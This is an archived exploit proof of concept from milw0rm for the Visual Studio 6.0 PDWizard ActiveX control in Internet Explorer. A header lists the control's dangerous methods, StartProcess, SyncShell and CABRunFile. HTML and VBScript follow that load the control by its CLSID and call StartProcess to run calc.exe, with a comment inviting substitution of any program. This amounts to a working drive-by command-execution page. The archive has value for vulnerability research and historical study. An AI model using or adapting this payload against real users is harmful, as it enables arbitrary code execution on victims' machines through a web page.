45 lines
No EOL
1.8 KiB
HTML
45 lines
No EOL
1.8 KiB
HTML
<pre>
|
|
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------------
|
|
<b>Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution</b>
|
|
url: http://www.microsoft.com
|
|
|
|
author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://shinnai.altervista.org
|
|
|
|
This was written for educational purpose. Use it at your own risk.
|
|
Author will be not responsible for any damage.
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
|
|
|
<b><font color='red'>greetz to: Wiz001 (be safe brotha... and see soon :D)</font></b>
|
|
|
|
<b>Description:
|
|
This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
|
|
"StartProcess()" and "SyncShell()"
|
|
Using one of them, you'll be able to run every program you like, simply giving to the method the
|
|
right argument.
|
|
In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
|
|
you like.
|
|
Anyway, I think you could imagine what impact could have this kind of vulnerability :D
|
|
|
|
Other dangerous methods of this ocx are:
|
|
"SaveAs()"
|
|
"CABDefaultURL()"
|
|
"CABFileName()"
|
|
"CABRunFile()"</b>
|
|
------------------------------------------------------------------------------------------------------
|
|
|
|
<object classid='clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685' id='test'></object>
|
|
|
|
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
|
|
|
<script language = 'vbscript'>
|
|
Sub tryMe()
|
|
test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application ;)
|
|
End Sub
|
|
</script>
|
|
</span></span>
|
|
</code></pre>
|
|
|
|
# milw0rm.com [2007-09-11] |